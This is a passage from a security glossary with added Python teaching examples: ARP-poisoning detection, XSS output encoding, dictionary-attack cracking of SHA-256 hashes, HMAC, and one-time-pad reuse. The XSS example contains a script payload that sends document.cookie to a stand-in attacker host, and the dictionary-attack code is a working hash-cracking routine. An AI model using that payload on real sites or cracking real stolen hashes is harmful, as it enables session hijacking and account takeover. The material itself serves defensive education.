Glossary

A

acceptable use

An organization’s policy that provides specific detail about what users may do with their network access, including email and instant messaging usage for personal purposes, limitations on access times, and the storage space available to each user.

access control list (ACL)

In its broadest sense, an access control list is the underlying data associated with a network resource that defines the access permissions. The most common privileges include the ability to read, write to, delete, and execute a file.

accounting

The tracking of users’ access to resources primarily for auditing purposes.

ActiveX

A Microsoft-developed, precompiled application technology that can be embedded in a web page in much the same way as Java applets. Because ActiveX controls run as native code with the user's privileges rather than in a sandbox, a malicious or vulnerable control is considerably more dangerous than an applet.

Address Resolution Protocol (ARP) poisoning

An attack in which a perpetrator sends forged (spoofed) ARP replies so that a device associates an attacker-chosen MAC address with any IP address, most often the default gateway's. Because ARP has no authentication, the attacker can also broadcast the forged reply to an entire segment and poison the ARP caches of every host on it, which enables interception and man-in-the-middle attacks on local traffic.
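
The poisoning described above shows up on the wire as an IP-to-MAC mapping that changes, or as one MAC claiming several IPs. The following is an added example, not part of the glossary, of a minimal detector for those two symptoms; it works on ARP replies already parsed into (sender IP, sender MAC) pairs, and the sample replies, the helper names and the optional trusted baseline are assumptions of the example.

```python
# Added example (not from the glossary): a minimal detector for ARP cache
# poisoning. It consumes ARP replies already parsed into (sender IP,
# sender MAC) pairs, as one would extract from a packet capture; the
# parsing step and the sample below are assumptions of this example.
from collections import defaultdict

# Constructed sample traffic. The gateway 192.168.1.1 really lives at
# aa:...:01. The attacker at cc:...:99 then claims the gateway's IP and
# also claims the victim's IP 192.168.1.10, placing itself between the two.
SAMPLE_REPLIES = [
    ("192.168.1.1",  "aa:aa:aa:aa:aa:01"),
    ("192.168.1.10", "bb:bb:bb:bb:bb:10"),
    ("192.168.1.1",  "cc:cc:cc:cc:cc:99"),   # gateway IP now maps to a new MAC
    ("192.168.1.10", "cc:cc:cc:cc:cc:99"),   # same MAC also claims the victim
]


def detect_arp_poisoning(replies, trusted=None):
    """Return a list of alert strings for suspicious ARP replies.

    Two heuristics are applied:
      1. an IP whose MAC differs from a trusted static mapping, or from
         the first mapping observed for that IP, and
      2. a single MAC that claims more than one IP address.
    `trusted` is an optional {ip: mac} baseline (for example the gateway)
    that observed traffic is never allowed to overwrite.
    """
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    first_seen = {}                      # ip -> first MAC observed
    mac_to_ips = defaultdict(set)        # mac -> set of IPs it has claimed
    for ip, mac in trusted.items():
        mac_to_ips[mac].add(ip)
    alerts = []

    for ip, mac in replies:
        mac = mac.lower()
        expected = trusted.get(ip, first_seen.get(ip))
        if expected is not None and expected != mac:
            source = "trusted mapping" if ip in trusted else "earlier reply"
            alerts.append(
                f"{ip} is claimed by {mac} but {source} says {expected}")
        first_seen.setdefault(ip, mac)

        already = mac_to_ips[mac]
        if already and ip not in already:
            alerts.append(
                f"{mac} claims {ip} in addition to {sorted(already)}")
        already.add(ip)
    return alerts


if __name__ == "__main__":
    for line in detect_arp_poisoning(SAMPLE_REPLIES):
        print("ALERT:", line)
```

The "first mapping wins" rule is a heuristic: a host that legitimately changes its NIC will also trip it, so in practice a trusted baseline for the gateway and DHCP server, plus a static ARP entry for the gateway on critical hosts, is the stronger control.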

algorithm

A set of sequenced steps that are repeatable. In encryption, the algorithm is used to define how the encryption is applied to data.

anomaly-based monitoring

Anomaly-based monitoring, a subset of behavior-based monitoring, stores normal system behavior profiles and triggers an alarm when some type of unusual behavior occurs.

antispam

A software program that can add another layer of defense to the infrastructure by filtering out undesirable email.

antivirus

A software program used to protect the user environment by scanning email, downloads, and stored files for malicious code.

applet

Java-based mini-program that executes when the client machine’s browser loads the hosting web page.

application logging

The recording by an application of its own security-relevant events, such as logons, failed input validation, and privilege changes. Application logging has become a major focus of security as more systems become Web-based and exploits such as cross-site scripting and SQL injection are an everyday occurrence.

asset

A company or personal resource that has value.

asymmetric key

A pair of mathematically related key values, one public and one private. Data encrypted with the public key can be decrypted only by the holder of the private key, which means anyone who obtains a copy of the public key can send data to the private key holder in confidence. Conversely, the private key creates digital signatures that anyone holding the public key can verify.

attack signature

A signature that identifies a known method of attack.

auditing

The tracking of user access to resources, primarily for security purposes.

Authentication Header (AH)

A component of the IPsec protocol that provides integrity, authentication, and anti-replay capabilities.

authentication

The process of verifying a claimed identity, for example by checking a password, a token, or a biometric.

authorization

The process of identifying what a given user is allowed to do.

availability

Ensures any necessary data is available when it is requested.

B

back door

A method of gaining access to a system or resource that bypasses normal authentication or access control methods.

backup technique

A defined method to provide for regular backups of key information, including user files and email storage, database stores, event logs, and security principal details such as user logons, passwords, and group membership assignments.

baseline

This measure of normal activity is used as a point to determine abnormal system and network behaviors.

behavior-based IDS

A detection method that identifies intrusions by comparing current system activity against a baseline of normal behavior rather than against known attack signatures. Deviations such as a continually operating hard drive or a significantly slowed level of performance are the kind of symptom such a system (or an observant user) flags.

behavior-based monitoring

The use of established patterns of baseline operations to identify variations that may identify unauthorized access attempts.

biometrics

Authentication based on some part of the human anatomy (retina, fingerprint, voice, and so on).

BIOS

Basic Input/Output System, the firmware code run when a system starts, before the operating system loads.

block cipher

Transforms a message from plain text (unencrypted form) to cipher text (encrypted form) one piece at a time, where the block size represents a standard chunk of data that is transformed in a single operation.

botnet

A large number of compromised computers under the remote control of an attacker, used to forward spam, launch distributed denial-of-service attacks, or relay other traffic on the Internet. You may also hear a botnet referred to as a zombie army.

business continuity plan

A plan that describes a long-term systems and services replacement and recovery strategy, designed for use when a complete loss of facilities occurs. A business continuity plan prepares for automatic failover of critical services to redundant offsite systems.

C

centralized key management

Involves a Certificate Authority generating both public and private key pairs for a user and then distributing them to the user.

certificate

An electronic document that includes the user’s public key and the digital signature of the certificate authority (CA) that has authenticated her. The digital certificate can also contain information about the user, the CA, and attributes that define what the user is allowed to do with systems she accesses using the digital certificate.

certificate authority (CA)

A system that issues, distributes, and maintains current information about digital certificates. Such authorities can be private (operated within a company or an organization for its own use) or public (operated on the Internet for general public access).

Certificate Enrollment Protocol (CEP)

A proprietary Cisco protocol that allows Cisco IOS–based routers to communicate with certificate authorities.

certificate life cycle

The period of time a certificate is valid. Issued certificates expire at the end of their lifetime and can be renewed.

Certificate Management Protocol (CMP)

A protocol used for advanced PKI management functions. These functions include certificate issuance, exchange, invalidation, revocation, and key update.

certificate policy

A statement that governs the usage of digital certificates.

certificate practice statement (CPS)

A document that defines the practices and procedures a CA uses to manage the digital certificates it issues.

certificate revocation

The act of invalidating a digital certificate.

certificate revocation list (CRL)

A list generated by a CA that enumerates digital certificates that are no longer valid and the reasons they are no longer valid.

certificate suspension

The act of temporarily invalidating a certificate while its validity is being verified.

chain of custody

The documentation of all transfers of evidence from one person to another, showing the date, time, and reason for transfer, and the signatures of both parties involved in the transfer. Chain of custody also refers to the process of tracking evidence from a crime scene to the courtroom.

Challenge Handshake Authentication Protocol (CHAP)

A widely used authentication method in which the server sends a random challenge and the client responds with a hash of that challenge combined with the user's secret. The password itself is never transmitted, and because the challenge changes each time, a captured response cannot simply be replayed.

change management

This term indicates that a formal process to schedule, implement, track, and document changes to policies, configurations, systems, and software is used in an organization.

cipher

A method for encrypting text. The term cipher is also used to refer to an encrypted message (although the term cipher text is preferred).

code of ethics

A formal list of rules governing personal and professional behavior that is adopted by a group of individuals or organizations. Many security certifications, including Security+, require their holders to adhere to a code of ethics that’s designed to foster ethical and legal behavior and discourage unethical or illegal behavior.

cold site

A remote site that has electricity, plumbing, and heating installed, ready for use when enacting disaster recovery or business continuity plans. At a cold site, all other equipment, systems, and configurations are supplied by the company enacting the plan.

confidentiality

Involves a rigorous set of controls and classifications associated with sensitive information to ensure that such information is neither intentionally nor unintentionally disclosed.

cookies

Small pieces of data that a website sets and the client's browser stores and returns on later requests, used to maintain settings or session state across multiple pages, servers, or sites. Because a session cookie is effectively a bearer credential, stealing it (for example, through cross-site scripting) lets an attacker hijack the session.

countermeasures

Methods used in some scenarios to provide an automatic response in the event of intrusion detection.

cross-certification

When two or more CAs choose to trust each other and issue credentials on each other’s behalf.

cross-site scripting (XSS)

Malicious script injected into a website and executed in the browsers of other users who view the page, allowing an attacker to hijack a user session, perform unauthorized actions as that user, expose confidential data, and report successful attacks back to the attacker. The root cause is untrusted input being placed into a page without proper output encoding.
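
The failure and the fix are easiest to see side by side. The following is an added example, not code from the glossary, rendering the same page fragment unsafely and safely in Python's standard library; the function names, the payload, and the attribute-context link helper are assumptions of the example.

```python
# Added example (not from the glossary): the same HTML fragment rendered
# unsafely and safely. Helper names and the payload are assumptions of
# this example; html and urllib are from the Python standard library.
import html
from urllib.parse import urlparse


def render_greeting_vulnerable(name):
    """Untrusted input concatenated straight into HTML. If `name` came
    from a query string or a stored profile, any <script> inside it runs
    in every viewer's browser with that viewer's session."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name):
    """Encode for the HTML text context: < > & " ' become entities, so the
    browser displays the payload as text instead of executing it."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def render_link_safe(url, text):
    """The attribute context needs more than escaping: a javascript: URL
    is harmless as text but executes as an href, so the scheme is checked
    against an allowlist and anything else is neutralised."""
    if urlparse(url).scheme.lower() not in ("http", "https"):
        url = "#"
    return (f'<a href="{html.escape(url, quote=True)}">'
            f'{html.escape(text, quote=True)}</a>')


# Constructed payload of the kind used to steal a session cookie.
PAYLOAD = ("<script>new Image().src='http://attacker.invalid/?c='"
           "+document.cookie</script>")

if __name__ == "__main__":
    print(render_greeting_vulnerable(PAYLOAD))   # script tag intact: exploitable
    print(render_greeting_safe(PAYLOAD))         # rendered as inert text
    print(render_link_safe("javascript:alert(1)", "click me"))
```

Escaping is context-specific: `html.escape` is correct for text and quoted attribute values, but a value placed inside a script block, a URL, or a CSS rule needs the encoder for that context, which is why templating engines with automatic, context-aware escaping are preferred over hand-built string concatenation.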

cryptographic module

Any combination of hardware, firmware, or software that implements cryptographic functions such as encryption, decryption, digital signatures, authentication techniques, and random number generation.

cryptography

A process that provides a method for protecting information by disguising (encrypting) it into a format that can be read only by authorized systems or individuals.

D

decentralized key management

Key management that occurs when a user generates a public and private key pair and then submits the public key to a certificate authority for validation and signature.

deflection

Redirecting or misdirecting attackers to secured segmented areas, allowing them to assume they have been successful while preventing access to secured resources.

degaussing

A method of removing recorded magnetic fields from magnetic storage media by applying strong cyclic magnetic pulses, thereby erasing the content and making the media unreadable.

demilitarized zone (DMZ)

Also called the neutral zone, a DMZ is an area in a network that allows limited and controlled access from the public Internet.

denial of service (DoS)

A type of attack that denies legitimate users access to a server or services by consuming sufficient system resources or network bandwidth or by rendering a service unavailable.

distributed denial of service (DDoS)

A DDoS attack originates from multiple systems simultaneously thereby causing even more extreme consumption of bandwidth and other resources than a DoS attack.

dictionary attack

An attack in which software hashes each word in a dictionary (or consults a precomputed table of hashed words) and compares the result to a captured hash, such as a password hash. This is repeated until a match is found, at which point the original password that was used as the basis of the hash is known. Per-user salts defeat precomputed tables by forcing the attacker to rehash the dictionary for every account.
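
The following is an added example, not code from the glossary, that carries the attack through against SHA-256 password hashes and shows why a salt matters. The word list and hashes are constructed for the example, and SHA-256 is used only because it is in the standard library; a real password store should use a deliberately slow hash such as bcrypt or scrypt.

```python
# Added example (not from the glossary): a dictionary attack against
# SHA-256 password hashes, with and without a salt. The word list and
# hashes are constructed for the example; SHA-256 is used only because it
# is in the standard library, not because it is a good password hash.
import hashlib

# Constructed word list. A real attack uses millions of leaked passwords.
WORDLIST = ["password", "letmein", "Summer2019", "qwerty", "dragon"]


def hash_password(password, salt=b""):
    """SHA-256 of salt || password, hex encoded. salt=b"" gives the
    unsalted hash that a naive system would store."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def dictionary_attack(target_hash, wordlist, salt=b""):
    """Hash each candidate (with the victim's salt, if any) and compare it
    to the captured hash. Returns (password, attempts) or (None, attempts).
    The attempt count is the work done: one hash per candidate per salt."""
    for attempts, word in enumerate(wordlist, start=1):
        if hash_password(word, salt) == target_hash:
            return word, attempts
    return None, len(wordlist)


def precompute_table(wordlist, salt=b""):
    """A 'hashed dictionary': hash -> word. Against unsalted hashes one
    table cracks every account in a dump with a single lookup each; a
    per-user salt forces the attacker to rebuild it for every account."""
    return {hash_password(word, salt): word for word in wordlist}


if __name__ == "__main__":
    stolen = hash_password("qwerty")            # unsalted hash from a breach
    print(dictionary_attack(stolen, WORDLIST))  # ('qwerty', 4)
    table = precompute_table(WORDLIST)
    print(table.get(stolen))                    # 'qwerty', no hashing at all
    salted = hash_password("qwerty", b"\x9f\x03")
    print(table.get(salted))                    # None: the table is useless
```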

digital certificate

See certificate.

digital signature

A hash of the message encrypted (signed) with the sender's private key, which proves the identity of the sender and the integrity of the message because only the matching public key will verify it. Signatures do not encrypt the contents of the message itself; they provide an electronic signature that authenticates the original sender of the message or data and detects any later change to it.

disaster recovery

Actions to be taken in case a business is hit with a natural or manmade disaster.

discretionary access control (DAC)

A distributed security method in which the owner of an object sets the permissions on it, rather than a central authority.

DMZ

See demilitarized zone.

Domain Name Service (DNS) kiting

DNS kiting refers to the practice of taking advantage of the Add Grace Period to monopolize domain names without even paying for them. How domain kiting works is that a domain name is deleted during the five-day AGP and immediately reregistered for another five-day period.

Domain Name Service (DNS) poisoning

DNS poisoning allows a perpetrator to redirect traffic by inserting a false IP address record for a specific domain into a resolver, thus sending requests meant for a legitimate site anywhere the attacker chooses. The resolver caches the false record for a period, so every client that relies on that resolver is redirected for as long as the entry lives.

dry-pipe fire suppression

A sprinkler system with pressurized air in the pipes. If a fire starts, a slight delay occurs as the pipes fill with water. This system is used in areas where wet-pipe systems might freeze.

due care

Assurance that the necessary steps are followed to satisfy a specific requirement, which can be an internal or external requirement, as in an agency regulation.

dumpster diving

Scavenging discarded equipment and documents and extracting sensitive information from them without ever contacting anyone in the company.

E

elliptic curve cryptography (ECC)

A public key method in which the mathematics of elliptic curves over finite fields is used to build key agreement, digital signature, and encryption schemes. It offers security comparable to RSA with much shorter keys, which makes it attractive for constrained devices.

Encapsulating Security Payload (ESP)

ESP can be used to provide confidentiality, data origin authentication, connectionless integrity, an anti-replay service, and traffic flow confidentiality.

encryption algorithm

A mathematical formula or method used to scramble information before it is transmitted over unsecure media. Examples include RSA, IDEA, and Blowfish. DH (key agreement), MD5 (hashing), and DSS/DSA (digital signatures) are often listed alongside them but are not themselves encryption algorithms.

environment

The physical conditions that affect and influence growth, development, and survival. Used in the security field to describe the surrounding conditions of an area to be protected.

escalation

The upward movement of privileges when using network resources or exercising rights (such as moving from read permissions to write).

evidence

Any hardware, software, or data that can be used to prove the identity and actions of an attacker.

Extensible Markup Language (XML)

A flexible markup language based on standards from the World Wide Web Consortium (W3C) that is used to provide widely accessible services and data to end users, exchange data among applications, and capture and represent data in a large variety of custom and standard formats.

extranet

A special internetwork architecture wherein a company’s or organization’s external partners and customers are granted access to some parts of its intranet and the services it provides in a secure, controlled fashion.

F

Faraday cage

A metal enclosure used to conduct stray EMEs (electromagnetic emissions) to ground, thereby eliminating signal leakage and the ability of external monitors or detectors to “read” network or computer activity. A Faraday cage can be very small or encompass an entire building, and it is generally used only when security concerns are extremely high (as in national defense, classified areas, or highly sensitive commercial environments).

Federal Information Processing Standard (FIPS)

A series of standards issued by the U.S. government. In a security context the term usually refers to FIPS 140, which specifies requirements for the evaluation of cryptographic modules and defines four security levels with escalating requirements.

firewall

A hardware device or software application designed to filter incoming or outgoing traffic based on predefined rules and patterns. Firewalls can filter traffic based on protocol uses, source or destination addresses, and port addresses; and they can even apply state-based rules to block unwanted activities or transactions.

forensics

As related to security, forensics is the process of analyzing and investigating a computer crime scene after an attack has occurred and of reconstructing the sequence of events and activities involved in such an attack.

G

Group Policy

Group Policy can be used for ease of administration in managing the environment of users in a Microsoft network. This can include installing software and updates or controlling what appears on the desktop. The Group Policy object (GPO) is used to apply a group policy to users and computers.

guideline

Specific information about how standards should be implemented. A guideline is generally not mandatory, thus acting as a kind of flexible rule used to produce a desired behavior or action. A guideline allows freedom of choice on how to achieve the behavior.

H

hash value

The resultant output generated by a cryptographic hash function when applied to a specific set of data. If computed and passed as part of an incoming message and then recomputed upon message receipt, such a hash value can be used to verify the received data when the two hash values match.

hashing

A methodology used to calculate a short, fixed-length value (a digest) from a data set of any size (usually an entire message or individual transmission units). This value is recalculated independently on the receiving end and compared to the submitted value to verify that the data was not altered. Because anyone can recompute a plain hash, verifying the sender's identity additionally requires a keyed hash (HMAC) or a digital signature.

honeypot

A decoy system designed to attract hackers. A honeypot usually has all its logging and tracing enabled, and its security level is lowered on purpose. Likewise, such systems often include deliberate lures or bait, in hopes of attracting would-be attackers who think there are valuable items to be attained on these systems.

host-based IDS (HIDS)

Host-based intrusion-detection systems (HIDSs) run on an individual host and monitor that host's own activity, such as file changes, log entries, and process behavior, and in some implementations its network traffic. These types of IDSs are good at detecting unauthorized file modifications and user activity.

hypervisor

A hypervisor controls how access to a computer's processors and memory is shared. A hypervisor or virtual machine monitor (VMM) is a virtualization platform that allows more than one operating system to run on a host computer at the same time.

hot site

A site that is immediately available for continuing computer operations if an emergency arises. It typically has all the necessary hardware and software loaded and configured and is available 24/7.

Hypertext Transfer Protocol over Secure Sockets Layer (HTTPS)

HTTP carried inside an SSL/TLS-protected connection, which encrypts the data transferred between the client and the Web server. HTTPS uses TCP port 443 by default.

I

identity proofing

Identity proofing is an organizational process that verifies a person's claimed identity before credentials are issued, thereby binding the user to their authentication methods. It gives the organization assurance that the user performing an authentication is the legitimate user, and it is the main component of authentication life cycle management.

incident

Any violation or threatened violation of a security policy.

incident response

A clear action plan on what each response team member needs to do and when it has to be done in the event of an emergency or a security incident.

integrity

Involves a monitoring and management system that performs integrity checks and protects systems from unauthorized modifications to data, system, and application files. When applied to messages or data in transit, integrity checks rely on calculating hash or digest values before and after transmission to ensure nothing changed between the time the data was sent and the time it was received.

Internet Key Exchange (IKE)

A method used in the IPsec protocol suite for public key exchange, security association parameter negotiation, identification, and authentication.

Internet Protocol Security (IPsec)

Used to secure IP traffic, IP Security provides security extensions to IPv4 and is built into IPv6. IPsec manages special relationships between pairs of machines, called security associations.

Internet Security Association and Key Management Protocol (ISAKMP)

Defines a common framework for the creation, negotiation, modification, and deletion of security associations.

intranet

A portion of the information technology infrastructure that belongs to and is controlled by the company in question.

intrusion

Malicious activity such as denial-of-service attacks, port scans, or attempts to break into computers.

intrusion-detection system (IDS)

A network-protection system designed to detect attacks in progress and raise alerts, but not to block them (blocking is the role of an intrusion-prevention system). Many IDSs record the apparent source of an attack, and some can trigger an automated response such as a firewall rule change.

K

Kerberos authentication

Kerberos defines a set of authentication services and includes the Authentication Service (AS) Exchange protocol, the Ticket-Granting Service (TGS) Exchange protocol, and the Client/Server (CS) Exchange protocol.

key escrow

Key escrow occurs when a CA or other entity maintains a copy of the private key associated with the public key signed by the CA.

key exchange

A technique by which two systems (typically a client and a server) establish a shared secret key over a network connection, either by one party encrypting a session key to the other's public key or by running a key-agreement algorithm such as Diffie-Hellman, so that a secure connection can be established between them.

key management

The methods for creating and managing cryptographic keys and digital certificates.

knowledge-based detection

Knowledge-based detection relies on the identification of known attack signatures and events that should never occur within a network.

L

Layer 2 Tunneling Protocol (L2TP)

A technology used with a VPN to establish a communication tunnel between communicating parties over unsecure media. L2TP permits a single logical connection to transport multiple protocols between a pair of hosts. L2TP is a member of the TCP/IP protocol suite and is defined in RFC 2661; a framework for creating virtual private networks that uses L2TP appears in RFC 2764. L2TP itself provides no encryption; in practice it is paired with IPsec (L2TP/IPsec) for confidentiality.

Lightweight Directory Access Protocol (LDAP)

A TCP/IP protocol that allows client systems to access directory services and related data. In most cases, LDAP is used as part of management or other applications or in browsers to access directory services information.

logic bomb

A piece of software designed to do damage at a predetermined point in time or in response to some type of condition (for example, “disk is 95% full”) or event (for example, some particular account logs in or some value the system tracks exceeds a certain threshold).

logical tokens

A method of access control used in addition to physical security controls to limit access to data.

M

M of N Control

A key-recovery control in which backed-up private key material is split into N shares held by different individuals, and at least M of them must cooperate to recreate the key. This protective measure ensures that no one individual can recover the key pair from the backup on their own.

man in the middle

An attack in which a hacker attempts to intercept data in a network stream and then inserts her own data into the communication with the goal of disrupting or taking over communications. The term itself is derived from the insertion of a third party—the proverbial “man in the middle”—between two parties engaged in communications.

mandatory access control (MAC)

A centralized security method that doesn’t allow users to change permissions on objects.

mantrap

A two-door configuration in a building or office that can lock unwanted individuals in a secured area, preventing them from entering other areas or even from exiting wherever it is they’re being held.

message

The content and format a sender chooses to use to communicate with some receiver across a network, an intranet, an extranet, or the Internet.

message digest

The fixed-size output of a cryptographic hash function applied to a chunk of data of any size. A message digest provides a strong integrity check because even a change to 1 bit in the target data also changes roughly half the bits of the resulting digest value. This explains why digests are included so often in network transmissions.
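
The hash value, hashing, and message digest entries all rely on the same two facts: a 1-bit change scrambles the digest, and a plain digest guards only against accidental corruption, because an attacker who alters the data can recompute it. The following is an added example, not code from the glossary, that demonstrates both and shows the keyed digest (HMAC) that closes the gap; the message, the key, and the helper names are assumptions of the example.

```python
# Added example (not from the glossary): plain digests versus keyed
# digests (HMAC). Message, key and helper names are assumptions of this
# example; hashlib and hmac are from the Python standard library.
import hashlib
import hmac


def digest(data):
    """Unkeyed SHA-256 digest, hex encoded."""
    return hashlib.sha256(data).hexdigest()


def verify_digest(data, expected):
    """Detects accidental corruption only: anyone, including an attacker
    who alters the data in transit, can recompute a matching digest."""
    return digest(data) == expected


def keyed_digest(key, data):
    """HMAC-SHA256: a digest that cannot be recomputed without the key."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_keyed_digest(key, data, expected):
    """Constant-time comparison, so timing does not leak how many leading
    characters of the tag were correct."""
    return hmac.compare_digest(keyed_digest(key, data), expected)


def flip_bit(data, bit_index):
    """Flip one bit of the data to show the avalanche effect."""
    buf = bytearray(data)
    buf[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(buf)


def differing_bits(hex_a, hex_b):
    """Number of bit positions in which two equal-length hex digests differ."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


if __name__ == "__main__":
    msg = b"transfer 100 to alice"          # constructed message
    tag = digest(msg)
    print("1-bit change flips", differing_bits(tag, digest(flip_bit(msg, 5))),
          "of 256 digest bits")

    # Active attacker: replaces the message AND the unkeyed digest.
    forged = b"transfer 100 to mallory"
    print("plain digest accepts forgery:", verify_digest(forged, digest(forged)))

    key = b"shared-secret-between-sender-and-receiver"
    mac = keyed_digest(key, msg)
    print("HMAC accepts genuine message:", verify_keyed_digest(key, msg, mac))
    print("HMAC accepts forgery:", verify_keyed_digest(key, forged, digest(forged)))
```

An HMAC proves the data came from someone holding the shared key; where the receiver must be able to prove to a third party who sent it, a digital signature over the digest is needed instead, since with a shared key either side could have produced the tag.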

misuse

Misuse is typically used to refer to unauthorized access by internal parties.

multifactor authentication

Multifactor authentication involves the use of two or more different forms (factors) of authentication. What you know (password, PIN), what you have (keycard, SecurID token), and what you are (biometrics) constitute different factors; two passwords are still a single factor.

mutual authentication

A situation in which a client provides authentication information to establish identity and related access permissions with a server and in which a server also provides authentication information to the client to ensure that illicit servers cannot masquerade as genuine servers.

N

network access control (NAC)

NAC offers a method of enforcement that helps ensure computers are properly configured. The premise behind NAC is to secure the environment by examining the user’s machine and based on the results, grant access accordingly.

Network Address Translation (NAT)

TCP/IP protocol technology that maps internal IP addresses to one or more external IP addresses through a NAT server of some type. NAT enables the conservation of public IP address space by mapping private IP addresses used in an internal LAN to one or more external public IP addresses to communicate with the external world. NAT also provides address-hiding services thus adding both security and simplicity to network addressing.

network-based IDS (NIDS)

Network-based IDSs monitor the packet flow and try to locate packets that may have gotten through the firewall and that are not allowed for one reason or another. They are best at detecting DoS attacks and unauthorized user access.

network-based IPS (NIPS)

A device or software program designed to sit inline with traffic flows and prevent attacks in real-time.

O

One Time Pad (OTP)

Within an OTP, there are as many bits in the key as there are in the plain text to be encrypted, and as the name suggests, the key must be truly random and used only once, with no portion of it ever being reused. When these conditions hold the cipher is provably unbreakable; reusing any part of the key destroys that guarantee, because XORing two ciphertexts encrypted under the same key cancels the key and exposes the XOR of the two plaintexts.
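
The following is an added example, not code from the glossary, of a one-time pad over bytes. It enforces the key-length requirement from the definition and then makes the reuse failure concrete: two messages under one pad, and the second plaintext recovered from the first with no key at all. The messages and helper names are assumptions of the example.

```python
# Added example (not from the glossary): a one-time pad over bytes, with
# the key-length check the definition requires and a demonstration of
# what key reuse leaks. Messages and helper names are assumptions.
import os


def otp_encrypt(plaintext, key):
    """XOR each plaintext byte with the corresponding key byte.
    The key must be exactly as long as the message: a shorter key would
    either truncate the message or have to repeat, and a repeating key
    is not a one-time pad."""
    if len(key) != len(plaintext):
        raise ValueError("key must be exactly as long as the plaintext")
    return bytes(p ^ k for p, k in zip(plaintext, key))


# XOR is its own inverse, so decryption is the same operation.
otp_decrypt = otp_encrypt


def generate_key(length):
    """Fresh random key from the OS CSPRNG, to be used exactly once."""
    return os.urandom(length)


def key_reuse_leak(ciphertext1, ciphertext2):
    """If two messages were encrypted under the same pad, XORing the
    ciphertexts cancels the key: (p1 ^ k) ^ (p2 ^ k) = p1 ^ p2.
    The attacker learns the XOR of the two plaintexts without the key."""
    return otp_encrypt(ciphertext1, ciphertext2)


def recover_with_crib(ciphertext1, ciphertext2, known_plaintext1):
    """Knowing (or guessing) one plaintext then yields the other."""
    return otp_encrypt(key_reuse_leak(ciphertext1, ciphertext2),
                       known_plaintext1)


if __name__ == "__main__":
    p1, p2 = b"attack at dawn", b"retreat at six"       # constructed, same length
    key = generate_key(len(p1))
    c1, c2 = otp_encrypt(p1, key), otp_encrypt(p2, key)  # the mistake: one key, twice
    print(otp_decrypt(c1, key))                          # b'attack at dawn'
    print(recover_with_crib(c1, c2, p1))                 # b'retreat at six', no key needed
```

The same leak is why stream ciphers, which are one-time pads with a pseudorandom key stream, must never reuse a key and nonce pair.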

Online Certificate Status Protocol (OCSP)

An Internet protocol defined by the IETF that is used to validate digital certificates issued by a CA. OCSP was created as an alternative to certificate revocation lists (CRLs) and overcomes certain limitations of CRL.

OSI model

The Open Systems Interconnection model is a logically structured seven-layer model that encompasses the translation of data entered at the application layer through increasingly more abstracted layers of data, resulting in the actual binary bits passed at the physical layer.

P

passive detection

A method of intrusion detection that has an IDS present in the network in a silent fashion; it does not interfere with communications in progress.

pattern matching

A network-analysis approach that compares each individual packet against a database of signatures. The inherent weakness in this method is that such patterns must be known (and definitions in place) before they can be used to recognize attacks or exploits.

performance baseline

See baseline.

performance monitoring

The act of using tools to monitor changes to system and network performance.

personally identifiable information (PII)

Privacy-sensitive information that identifies or can be used to identify, contact, or locate the person to whom such information pertains.

Point-to-Point Tunneling Protocol (PPTP)

A TCP/IP technology used to create virtual private networks (VPN) or remote-access links between sites or for remote access. PPTP is generally regarded as less secure than L2TP and is used less frequently for that reason.

policy

A broad statement of views and positions. A policy that states high-level intent with respect to a specific area of security is more properly called a security policy.

pop-up blocker

A program used to block a common method for Internet advertising, using a window that pops up in the middle of your screen to display a message when you click a link or button on a website.

Pretty Good Privacy (PGP)

An encryption technology for communications (originally distributed as shareware) that combines public key and symmetric encryption: the message is encrypted with a fast symmetric session key, and only that session key is encrypted with the recipient's public key, which speeds up encryption without compromising security.

private key

In public key encryption, the key that its owner keeps secret. It decrypts messages encrypted with the corresponding public key and creates digital signatures that the public key verifies.

privilege escalation

Exploitation of a flaw in a program's code or of a misconfiguration to gain privileges beyond those granted, typically allowing arbitrary code to execute with elevated rights or letting an intruder function as an administrator.

privilege management

The process of controlling users and their capabilities on a network.

probability

Used in risk assessment, probability measures the likelihood or chance that a threat will actually exploit some vulnerability.

procedure

A procedure specifies how policies will be put into practice in an environment (that is, it provides necessary how-to instructions).

protocol analyzer

Protocol analyzers help troubleshoot network issues by gathering packet level information across the network. These applications capture packets and decode the information into readable data for analysis.

Private Branch Exchange (PBX)

A telephone switch used on a company’s or organization’s premises to create a local telephone network. Using a PBX eliminates the need to order numerous individual phone lines from a telephone company and permits PBX owners to offer advanced telephony features and functions to their users.

public key

A key that is made available to whoever is going to encrypt the data sent to the holder of a private key.

Public Key Cryptography Standards (PKCS)

The de facto cryptographic message standards developed and published by RSA Laboratories.

public key infrastructure (PKI)

A paradigm that encompasses certificate authorities and X.509 certificates used with public encryption algorithms to distribute, manage, issue, and revoke public keys. Public key infrastructures typically also include registration authorities to issue and validate requests for digital certificates, a certificate-management system of some type, and a directory in which certificates are stored and can be accessed. Together, all these elements make up a PKI.

Public Key Infrastructure based on X.509 Certificates (PKIX)

A working group of the Internet Engineering Task Force (IETF) focused on developing Internet standards for certificates.

R

receiver

The party that receives a message from its sender.

redundancy planning

The process of planning for continuing service in the event of failure by providing more than one of the same components or services.

redundant array of inexpensive disks (RAID)

A redundant array of inexpensive disks is an organization of multiple disks into a large, high-performance logical disk to provide redundancy in the event of a disk failure.

Remote Authentication Dial-In User Services (RADIUS)

An Internet protocol, used for remote-access services. It conveys user authentication and configuration data between a centralized authentication server and a remote-access server (RADIUS client) to permit the remote access server to authenticate requests to use its network access ports.

replay

An attack that involves capturing valid traffic from a network and then retransmitting that traffic at a later time to gain unauthorized access to systems and resources.

removable storage

A small, high-capacity, removable device that can store information, such as an iPod, thumb drive, or cell phone.

restoration

The process whereby data backups are restored into the production environment.

retention policy

Documentation of the amount of time an organization will retain information.

risk

The potential that a threat might exploit some vulnerability.

role

A defined behavior for a user or group of users based on some specific activity or responsibilities. (For example, a tape backup administrator is usually permitted to back up all files on one or more systems; that person might or might not be allowed to restore such files, depending on the local security policies in effect.)

role-based access control (RBAC)

A security method that combines both MAC and DAC. RBAC uses profiles. Profiles are defined for specific roles within a company, and then users are assigned to such roles. This facilitates administration in a large group of users because when you modify a role and assign it new permissions, those settings are automatically conveyed to all users assigned to that role.

rollback

